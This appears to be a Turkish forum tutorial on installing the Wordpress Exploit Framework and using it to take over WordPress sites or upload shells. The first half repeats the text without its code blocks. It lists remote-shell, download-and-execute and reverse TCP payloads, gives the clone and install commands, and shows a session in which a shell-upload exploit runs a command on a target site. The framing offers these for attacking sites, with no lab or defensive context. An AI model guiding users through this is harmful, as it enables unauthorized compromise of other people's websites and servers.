Wordpress Exploit Framework
Wordpress sitelerde bulunan birçok exploit zaafiyetini Wordpress Exploit Framework kullanarak ele geçirebilir veya shell yükleyebilirsiniz.
İçerisinde 288 Exploit, 58 Auxilaries, 7 Payload bulunmaktadır.
Exploit ve Auxiliary Modülleri Arasındaki Farklar
Auxiliary modülleri, hedef makineden bilgi almanıza, ayrıcalıkları yükseltmenize veya hizmet işlevselliklerini reddetmenize olanak tanır. Tüm bunları yaparken karşı makinede yük çalıştırmaz.
Exploit modülleri, exploit cihaza atıldıktan sonra çalıştırılan, makineden bilgi toplamak, uzaktan shell veya web sunucusuna bağlanmak için rastgele kod çalıştırmanıza olanak sağlayan paketler bulunduran bir derlemedir.
Yüklü Payloadlar
bind_php: Belirli bir bağlantı noktasına bağlanacak ve WPXF'nin shell oluşturmasına izin verecek bir komut dosyası yükler.
custom: Özel bir PHP betiğini yükler ve çalıştırır.
download_exec: İndirilebilen ve uzaktan çalıştırılabilen bir dosyayı çalıştırır.
exec: Uzak sunucuda bir shell komutu çalıştırır ve çıktıyı WPXF oturumuna döndürür.
reverse_tcp: Ters TCP shell' oluşturacak bir komut dosyası
Ön Kurulum
Eğer bundler sisteminizde yüklü değilse yükleyiniz.
C uzantılarını derlemek için gerekli tüm araçlara sahip olduğunuzdan emin olun.
Ayrıca, geliştirme dosyalarının sisteminizde yüklü olduğundan emin olun.
Kurulum
Öncelikle kurulum için Masaüstüne geliyoruz.(Rahatça erişebilmek için masaüstüne yüklüyorum, isteyenler ana dizine yükleyebilirler.)
Daha sonra github'dan frameworkümüzü indirmek için aşağıdaki kodu giriyoruz.
Masaüstüne indirdiğimiz klasörümüze giriyoruz.
Framework kurulumunu çalıştırıyoruz.(Sistemde yönetici olduğunuzdan emin olun.)
Framework'ümüzü açıyoruz.
Ve bizi exploit framework'ümüzün girişi karşılıyor.
Örnek Kullanım
Bunun gibi birçok exploit ve auxiliary mevcuttur. Bulmak için:
Wordpress sitelerde bulunan birçok exploit zaafiyetini Wordpress Exploit Framework kullanarak ele geçirebilir veya shell yükleyebilirsiniz.
İçerisinde 288 Exploit, 58 Auxilaries, 7 Payload bulunmaktadır.
Exploit ve Auxiliary Modülleri Arasındaki Farklar
Auxiliary modülleri, hedef makineden bilgi almanıza, ayrıcalıkları yükseltmenize veya hizmet işlevselliklerini reddetmenize olanak tanır. Tüm bunları yaparken karşı makinede yük çalıştırmaz.
Exploit modülleri, exploit cihaza atıldıktan sonra çalıştırılan, makineden bilgi toplamak, uzaktan shell veya web sunucusuna bağlanmak için rastgele kod çalıştırmanıza olanak sağlayan paketler bulunduran bir derlemedir.
Yüklü Payloadlar
bind_php: Belirli bir bağlantı noktasına bağlanacak ve WPXF'nin shell oluşturmasına izin verecek bir komut dosyası yükler.
custom: Özel bir PHP betiğini yükler ve çalıştırır.
download_exec: İndirilebilen ve uzaktan çalıştırılabilen bir dosyayı çalıştırır.
exec: Uzak sunucuda bir shell komutu çalıştırır ve çıktıyı WPXF oturumuna döndürür.
reverse_tcp: Ters TCP shell' oluşturacak bir komut dosyası
Ön Kurulum
Eğer bundler sisteminizde yüklü değilse yükleyiniz.
Kod:
gem install bundler
C uzantılarını derlemek için gerekli tüm araçlara sahip olduğunuzdan emin olun.
Kod:
sudo apt-get install build-essential patch
Ayrıca, geliştirme dosyalarının sisteminizde yüklü olduğundan emin olun.
Kod:
sudo apt-get install ruby-dev zlib1g-dev liblzma-dev
Kurulum
Öncelikle kurulum için Masaüstüne geliyoruz.(Rahatça erişebilmek için masaüstüne yüklüyorum, isteyenler ana dizine yükleyebilirler.)
Kod:
cd Desktop
Daha sonra github'dan frameworkümüzü indirmek için aşağıdaki kodu giriyoruz.
Kod:
git clone https://github.com/rastating/wordpress-exploit-framework.git
Masaüstüne indirdiğimiz klasörümüze giriyoruz.
Kod:
cd wordpress-exploit-framework
Framework kurulumunu çalıştırıyoruz.(Sistemde yönetici olduğunuzdan emin olun.)
Kod:
bash rebuild_and_install_gem.sh
Framework'ümüzü açıyoruz.
Kod:
ruby wpxf.rb
Ve bizi exploit framework'ümüzün girişi karşılıyor.
Örnek Kullanım
Kod:
wpxf > use exploit/shell/symposium_shell_upload
[+] Loaded module: #<Wpxf::Exploit::SymposiumShellUpload:0x3916f20>
wpxf [exploit/symposium_shell_upload] > set host wordpresssite //wordpress açıklı site
[+] Set host => wordpresssite
wpxf [exploit/symposium_shell_upload] > set target_uri /wordpress/ //Açığın bulunduğu satır
[+] Set target_uri => /wordpress/
wpxf [exploit/symposium_shell_upload] > set payload exec //Exploit için seçtiğimiz payload
[+] Loaded payload: #<Wpxf::Payloads::Exec:0x434d078>
wpxf [exploit/symposium_shell_upload] > set cmd echo "Hello, world!" //Yüklenen shellde vermek istediğimiz mesaj
[+] Set cmd => echo "Hello, world!"
wpxf [exploit/symposium_shell_upload] > run //Çalıştırma komutu
[-] Preparing payload...
[-] Uploading the payload...
[-] Executing the payload...
[+] Result: Hello, world!
[+] Execution finished successfully
Bunun gibi birçok exploit ve auxiliary mevcuttur. Bulmak için:
Kod:
show payloads
Kod:
show exploits
Kod:
show auxiliaries
Son düzenleme: